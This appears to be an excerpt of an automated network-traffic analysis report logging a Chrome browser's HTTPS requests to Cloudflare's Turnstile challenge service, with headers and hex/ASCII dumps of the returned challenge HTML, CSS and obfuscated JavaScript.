                                                2024-08-20 13:41:58 UTC1369INData Raw: 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 61 29 7d 2c 73 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 5a 74 28 65 29 7b 72 65 74 75 72 6e 20 46 75 6e 63 74 69 6f 6e 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 2e 69 6e 64 65 78 4f 66 28 22 5b 6e 61 74 69 76 65 20 63 6f 64 65 5d 22 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 50 65 28 65 29 7b 76 61 72 20 72 3d 74 79 70 65 6f 66 20 4d 61 70 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 6e 65 77 20 4d 61 70 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 50 65 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 69 66 28 6f 3d 3d 3d 6e 75 6c 6c 7c 7c 21 5a 74 28 6f 29 29 72 65 74 75 72 6e 20 6f 3b 69 66 28 74 79 70 65 6f 66 20 6f 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29
                                                Data Ascii: __proto__||Object.getPrototypeOf(a)},se(e)}function Zt(e){return Function.toString.call(e).indexOf("[native code]")!==-1}function Pe(e){var r=typeof Map=="function"?new Map:void 0;return Pe=function(o){if(o===null||!Zt(o))return o;if(typeof o!="function")
                                                2024-08-20 13:41:58 UTC1369INData Raw: 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 72 2e 73 72 63 29 29 72 65 74 75 72 6e 20 72 3b 66 6f 72 28 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 73 63 72 69 70 74 22 29 2c 6f 3d 30 2c 63 3b 63 3d 61 5b 6f 5d 3b 6f 2b 2b 29 69 66 28 50 28 63 2c 48 54 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 63 2e 73 72 63 29 29 72 65 74 75 72 6e 20 63 7d 66 75 6e 63 74 69 6f 6e 20 61 72 28 29 7b 76 61 72 20 65 3d 67 74 28 29 3b 65 7c 7c 76 28 22 43 6f 75 6c 64 20 6e 6f 74 20 66 69 6e 64 20 54 75 72 6e 73 74 69 6c 65 20 73 63 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 34
                                                Data Ascii: riptElement)&&e.test(r.src))return r;for(var a=document.querySelectorAll("script"),o=0,c;c=a[o];o++)if(P(c,HTMLScriptElement)&&e.test(c.src))return c}function ar(){var e=gt();e||v("Could not find Turnstile script tag, some features may not be available",4
                                                2024-08-20 13:41:58 UTC1369INData Raw: 28 22 61 6c 6c 6f 77 22 2c 22 63 72 6f 73 73 2d 6f 72 69 67 69 6e 2d 69 73 6f 6c 61 74 65 64 3b 20 66 75 6c 6c 73 63 72 65 65 6e 22 29 2c 66 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 61 6e 64 62 6f 78 22 2c 22 61 6c 6c 6f 77 2d 73 61 6d 65 2d 6f 72 69 67 69 6e 20 61 6c 6c 6f 77 2d 73 63 72 69 70 74 73 20 61 6c 6c 6f 77 2d 70 6f 70 75 70 73 20 61 6c 6c 6f 77 2d 66 6f 72 6d 73 22 29 2c 66 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 63 72 6f 6c 6c 69 6e 67 22 2c 22 6e 6f 22 29 2c 66 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 57 69 64 74 68 3d 22 30 70 78 22 2c 66 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 25 22 2c 66 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 25 22 2c 66 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 3d 22 68 69 64 64
                                                Data Ascii: ("allow","cross-origin-isolated; fullscreen"),f.setAttribute("sandbox","allow-same-origin allow-scripts allow-popups allow-forms"),f.setAttribute("scrolling","no"),f.style.borderWidth="0px",f.style.width="100%",f.style.height="100%",f.style.overflow="hidd


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                23192.168.2.1649747104.18.95.414435912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-20 13:41:58 UTC798OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/xbh34/0x4AAAAAAAhidKplJ_I6A90O/auto/fbE/normal/auto/ HTTP/1.1
                                                Host: challenges.cloudflare.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                sec-ch-ua-platform: "Windows"
                                                Upgrade-Insecure-Requests: 1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Sec-Fetch-Site: cross-site
                                                Sec-Fetch-Mode: navigate
                                                Sec-Fetch-Dest: iframe
                                                Referer: https://riseandgain.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-08-20 13:41:58 UTC1362INHTTP/1.1 200 OK
                                                Date: Tue, 20 Aug 2024 13:41:58 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Content-Length: 74472
                                                Connection: close
                                                accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                origin-agent-cluster: ?1
                                                critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                cross-origin-embedder-policy: require-corp
                                                cross-origin-resource-policy: cross-origin
                                                cross-origin-opener-policy: same-origin
                                                permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                referrer-policy: same-origin
                                                document-policy: js-profiling
                                                2024-08-20 13:41:58 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 62 36 32 63 64 64 33 32 64 39 37 31 38 62 31 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                Data Ascii: Server: cloudflareCF-RAY: 8b62cdd32d9718b1-EWRalt-svc: h3=":443"; ma=86400
                                                2024-08-20 13:41:58 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                2024-08-20 13:41:58 UTC1369INData Raw: 28 31 2e 35 29 3b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 31 3b 0a 20 20 7d 0a 20 20 31 30 30 25 20 7b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 32 29 3b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 0a 20 20 7d 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 66 69 72 65 77 6f 72 6b 20 7b 0a 20 20 30 25 20 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 0a 20 20 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 20 38 3b 20 2f 2a 20 6c 65 6e 67 74 68 20 2a 2f 0a 20 20 7d 0a 20 20 33 30 25 20 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 31 3b 0a 20 20 7d 0a 20 20 31 30 30 25 20 7b 0a 20 20 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 20 2d 38 3b 20 2f 2a 20 6c 65 6e 67 74 68 20 2a 2f 0a 20 20 7d 0a 7d 0a 40
                                                Data Ascii: (1.5); opacity: 1; } 100% { transform: scale(2); opacity: 0; }}@keyframes firework { 0% { opacity: 0; stroke-dashoffset: 8; /* length */ } 30% { opacity: 1; } 100% { stroke-dashoffset: -8; /* length */ }}@
                                                2024-08-20 13:41:58 UTC1369INData Raw: 65 78 3b 0a 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 36 70 78 20 30 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72 69 67 68 74 3b 0a 7d 0a 0a 23 73 70 69 6e 6e 65 72 2d 69 63 6f 6e 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 77 69 64 74 68 3a 20 33 30 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 33 30 70 78 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 35 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 0a 7d 0a 0a 23 66 61 69 6c 2d 69 63 6f 6e 2c 20 23 6f 76 65 72 72 75 6e 2d 69 63 6f 6e 20 7b 0a 20 20 77 69 64 74 68 3a 20 33 30 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 33 30 70 78 3b 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78
                                                Data Ascii: ex; flex-direction: column; margin: 0 16px 0 0; text-align: right;}#spinner-icon { display: flex; width: 30px; height: 30px; animation: spin 5s linear infinite;}#fail-icon, #overrun-icon { width: 30px; height: 30px; display: flex
                                                2024-08-20 13:41:58 UTC1369INData Raw: 74 65 72 6c 69 6d 69 74 3a 20 31 30 3b 0a 20 20 73 74 72 6f 6b 65 3a 20 23 30 33 38 31 32 37 3b 0a 20 20 66 69 6c 6c 3a 20 23 30 33 38 31 32 37 3b 0a 7d 0a 0a 23 6f 76 65 72 72 75 6e 2d 74 65 78 74 2c 0a 23 74 69 6d 65 6f 75 74 2d 74 65 78 74 2c 0a 23 65 78 70 69 72 65 64 2d 74 65 78 74 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 69 6e 68 65 72 69 74 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 7d 0a 0a 23 74 69 6d 65 6f 75 74 2d 72 65 66 72 65 73 68 2d 6c 69 6e 6b 2c 0a 23 65 78 70 69 72 65 64 2d 74 65 78 74 2c 0a 23 74 69 6d 65 6f 75 74 2d 74 65 78 74 2c 0a 23 65 78 70 69 72 65 64 2d 72 65 66 72 65 73 68 2d 6c 69 6e 6b 2c 0a 23 6f
                                                Data Ascii: terlimit: 10; stroke: #038127; fill: #038127;}#overrun-text,#timeout-text,#expired-text { margin: 0; text-align: inherit; font-size: 14px; font-weight: 400;}#timeout-refresh-link,#expired-text,#timeout-text,#expired-refresh-link,#o
                                                2024-08-20 13:41:58 UTC1369INData Raw: 6b 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 76 69 73 69 74 65 64 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 6c 69 6e 6b 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 62 62 62 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 68 6f 76 65 72 2c 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 61 63 74 69 76 65 2c 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 66 6f 63 75 73 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72
                                                Data Ascii: k,.theme-dark #challenge-error-text a:visited,.theme-dark #challenge-error-text a:link { color: #bbb;}.theme-dark #challenge-overlay a:hover, .theme-dark #challenge-overlay a:active, .theme-dark #challenge-overlay a:focus,.theme-dark #challenge-err
                                                2024-08-20 13:41:58 UTC1369INData Raw: 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 74 65 72 6d 73 20 61 3a 66 6f 63 75 73 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 39 34 39 34 39 34 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 6f 6e 74 65 6e 74 20 7b 0a 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 39 37 39 37 39 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 33 32 33 32 33 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 71 72 20 7b 0a 20 20 66 69 6c 6c 3a 20 72 67 62 28 32 34 33 2c 20 31 32 38 2c 20 33 32 29 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 20 7b 0a 20 20 66 69 6c 6c 3a 20 23 66 66 66 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 20 7b 0a 20 20 63 6f
                                                Data Ascii: .theme-dark #terms a:focus { color: #949494;}.theme-dark #content { border-color: #797979; background-color: #232323;}.theme-dark #qr { fill: rgb(243, 128, 32);}.theme-dark .logo-text { fill: #fff;}.theme-dark #fr-helper-loop-link { co
                                                2024-08-20 13:41:58 UTC1369INData Raw: 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 66 66 61 32 39 39 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 20 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 66 66 61 32 39 39 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 20 61 3a 6c 69 6e 6b 2c 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 20 61 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 66 66 61 32 39 39 3b 0a 7d 0a 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 7b 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 74 6f 70 3a 20 30 3b 0a 20 20 7a 2d
                                                Data Ascii: }.theme-dark .error-message { color: #ffa299;}.theme-dark .error-message a { color: #ffa299;}.theme-dark .error-message a:link, .theme-dark .error-message a:visited { color: #ffa299;}#challenge-overlay { position: absolute; top: 0; z-
                                                2024-08-20 13:41:58 UTC1369INData Raw: 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 20 20 77 69 64 74 68 3a 20 32 34 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 7d 0a 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 61 63 74 69 76 65 20 7e 20 2e 63 62 2d 69 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 63 34 34 64 30 65 3b 0a 7d 0a 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 20 7e 20 2e 63 62 2d 69 20 7b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 20 73 63 61 6c 65 28 31 29 3b 0a 20 20 6f 70 61 63 69 74 79 3a 20 31 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 70 78 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b
                                                Data Ascii: margin: 0; cursor: pointer; width: 24px; height: 24px;}.cb-lb input:active ~ .cb-i { border: 2px solid #c44d0e;}.cb-lb input:checked ~ .cb-i { transform: rotate(0deg) scale(1); opacity: 1; border-radius: 5px; background-color: white;
                                                2024-08-20 13:41:58 UTC1369INData Raw: 61 6e 64 69 6e 67 20 7b 0a 20 20 66 6c 65 78 2d 66 6c 6f 77 3a 20 72 6f 77 2d 72 65 76 65 72 73 65 20 77 72 61 70 3b 0a 20 20 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 20 66 6c 65 78 2d 73 74 61 72 74 3b 0a 20 20 61 6c 69 67 6e 2d 73 65 6c 66 3a 20 66 6c 65 78 2d 65 6e 64 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 32 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72 69 67 68 74 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 74 65 72 6d 73 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72 69 67 68 74 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 71 72 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 73 69 7a
                                                Data Ascii: anding { flex-flow: row-reverse wrap; place-content: center flex-start; align-self: flex-end; margin: 0 12px; padding-right: 0; text-align: right;}.size-compact #terms { text-align: right;}.size-compact #qr { text-align: center;}.siz


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                24192.168.2.1649748104.18.95.414435912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-20 13:41:59 UTC730OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8b62cdd32d9718b1&lang=auto HTTP/1.1
                                                Host: challenges.cloudflare.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: script
                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/xbh34/0x4AAAAAAAhidKplJ_I6A90O/auto/fbE/normal/auto/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-08-20 13:41:59 UTC331INHTTP/1.1 200 OK
                                                Date: Tue, 20 Aug 2024 13:41:59 GMT
                                                Content-Type: application/javascript; charset=UTF-8
                                                Content-Length: 121620
                                                Connection: close
                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                Server: cloudflare
                                                CF-RAY: 8b62cdd7286641c1-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-08-20 13:41:59 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 5a 63 51 66 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73
                                                Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.ZcQf2={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https
                                                2024-08-20 13:41:59 UTC1369INData Raw: 79 22 3a 22 50 72 69 76 61 63 79 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 2e 22 2c 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 6f 75 74 70 75 74 5f 73 75 62 74 69 74 6c 65 22 3a 22 59 6f 75 72 20 66 65 65 64 62 61 63 6b 20 72 65 70 6f 72 74 20 68 61 73 20 62 65 65 6e 20 73 75 63 63 65 73 73 66 75 6c 6c 79 20 73 75 62 6d 69 74 74 65 64 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 76 65 72 69 66 79 69 6e 67 22 3a 22 56 65 72 69 66 79 69 6e 67 2e 2e 2e 22 2c 22 63 68 65 63 6b 5f 64 65 6c 61 79 73 22 3a 22 56 65 72 69 66 69 63 61 74 69 6f 6e 25 32 30 69 73 25 32 30 74 61 6b 69 6e 67 25 32 30 6c 6f 6e 67 65 72 25 32 30 74 68 61 6e 25 32 30 65 78 70 65 63 74 65 64 2e 25 32 30 43 68 65 63 6b 25 32 30 79 6f
                                                Data Ascii: y":"Privacy","testing_only":"Testing%20only.","feedback_report_output_subtitle":"Your feedback report has been successfully submitted","turnstile_verifying":"Verifying...","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20yo
                                                2024-08-20 13:41:59 UTC1369INData Raw: 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 48 28 31 38 38 33 29 29 2f 31 30 29 2c 64 3d 3d 3d 66 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 38 39 34 35 37 36 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 49 28 37 32 36 29 5d 2c 65 4d 5b 67 49 28 31 36 36 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 67 55 2c 65 29 7b 65 3d 28 67 55 3d 67 49 2c 7b 27 46 76 48 50 63 27 3a 67 55 28 31 32 38 30 29 2c 27 67 6d 6c 69 63 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 67 28 68 29 7d 7d 29 3b 74 72 79 7b 72 65 74 75 72 6e 20 65 51 28 63 29 7d 63 61 74 63 68 28 67 29 7b 72 65 74 75 72 6e
                                                Data Ascii: *(-parseInt(gH(1883))/10),d===f)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,894576),eM=this||self,eN=eM[gI(726)],eM[gI(1665)]=function(c,gU,e){e=(gU=gI,{'FvHPc':gU(1280),'gmlic':function(g,h){return g(h)}});try{return eQ(c)}catch(g){return
                                                2024-08-20 13:41:59 UTC1369INData Raw: 35 29 5d 2c 69 2b 44 29 3f 6f 5b 67 59 28 38 38 32 29 5d 28 73 2c 69 2b 44 2c 45 29 3a 46 7c 7c 6f 5b 67 59 28 38 38 32 29 5d 28 73 2c 69 2b 44 2c 68 5b 44 5d 29 29 3a 73 28 6f 5b 67 59 28 37 38 30 29 5d 28 69 2c 44 29 2c 45 29 2c 43 2b 2b 29 3b 72 65 74 75 72 6e 20 6a 3b 66 75 6e 63 74 69 6f 6e 20 73 28 47 2c 48 2c 67 5a 2c 4a 2c 4b 29 7b 28 67 5a 3d 67 59 2c 67 5a 28 35 30 33 29 3d 3d 3d 67 5a 28 35 36 37 29 29 3f 28 4a 3d 44 5b 67 5a 28 31 34 31 35 29 5d 5b 67 5a 28 31 31 36 34 29 5d 7c 7c 31 65 34 2c 4b 3d 42 28 29 2c 21 45 5b 67 5a 28 39 36 39 29 5d 26 26 21 43 28 29 26 26 21 6f 5b 67 5a 28 35 30 36 29 5d 5b 67 5a 28 31 34 30 30 29 5d 26 26 6f 5b 67 5a 28 31 38 37 35 29 5d 28 4b 2c 73 29 3e 4a 3f 42 28 29 3a 43 28 29 29 3a 28 4f 62 6a 65 63 74 5b 67
                                                Data Ascii: 5)],i+D)?o[gY(882)](s,i+D,E):F||o[gY(882)](s,i+D,h[D])):s(o[gY(780)](i,D),E),C++);return j;function s(G,H,gZ,J,K){(gZ=gY,gZ(503)===gZ(567))?(J=D[gZ(1415)][gZ(1164)]||1e4,K=B(),!E[gZ(969)]&&!C()&&!o[gZ(506)][gZ(1400)]&&o[gZ(1875)](K,s)>J?B():C()):(Object[g
